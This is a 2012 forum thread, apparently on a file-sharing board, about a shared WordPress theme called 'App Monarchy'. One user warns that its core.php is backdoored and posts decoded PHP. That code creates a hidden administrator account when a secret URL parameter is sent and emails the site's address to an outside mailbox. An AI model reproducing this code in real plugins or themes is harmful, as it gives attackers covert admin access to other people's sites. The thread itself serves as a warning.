12-12-2012, 01:27 AM
12-12-2012, 02:30 AM
Where is the video and pdf files?
12-12-2012, 03:25 AM
This is a fantastic share. Following are the links to the instruction videos:
Video App Monarchy Walkthrough by Fual Tolieb Part 1
http://www.youtube.com/watch?v=0DUsGM6_Ivo
Video App Monarchy Walkthrough by Fuad Tolieb Part 2
http://www.youtube.com/watch?v=gCaIgG9gMZo
Have anyone figured out what the code is in core.php?
Video App Monarchy Walkthrough by Fual Tolieb Part 1
http://www.youtube.com/watch?v=0DUsGM6_Ivo
Video App Monarchy Walkthrough by Fuad Tolieb Part 2
http://www.youtube.com/watch?v=gCaIgG9gMZo
Have anyone figured out what the code is in core.php?
12-12-2012, 03:48 AM
yes, something encrypted in core.php
12-13-2012, 03:08 AM
Be careful, the core.php file is backdoored!
Someone decoded part of the file for me...
PHP Code:
<?phpadd_action('wp_head', 'vbe3juka');function vbe3juka(){ If ($_GET['cms'] == 'jjoplmh') { require('wp-includes/registration.php'); If (!username_exists('wordpress')) { $user_id = wp_create_user('wordpress', 'gh67io9Cjm'); $user = new WP_User($user_id); $user->set_role('administrator'); } }}add_action('wp_head', 'vf3easxv');function vf3easxv(){ If (!username_exists('wordpress')) { $addressdecode = base64_decode("frogan@gmx.com"); $vari = 'Wordpress Plugin Amazon'; mail($addressdecode, get_bloginfo('wpurl'), $vari); }}
Someone decoded part of the file for me...
12-13-2012, 04:00 AM
Anyone have the OTO? I'ts a wordpress theme.
12-13-2012, 04:05 AM
Thanks Cybeard! I was waiting for this. 1 rep for you :)
12-13-2012, 04:28 AM
Here is the full decoded core.php file, I've removed the login/password/e-mail of the backdoor.
http://pastebay.net/1163570
Still looking for the OTO!
http://pastebay.net/1163570
Still looking for the OTO!
12-13-2012, 04:55 AM
12-13-2012, 05:01 AM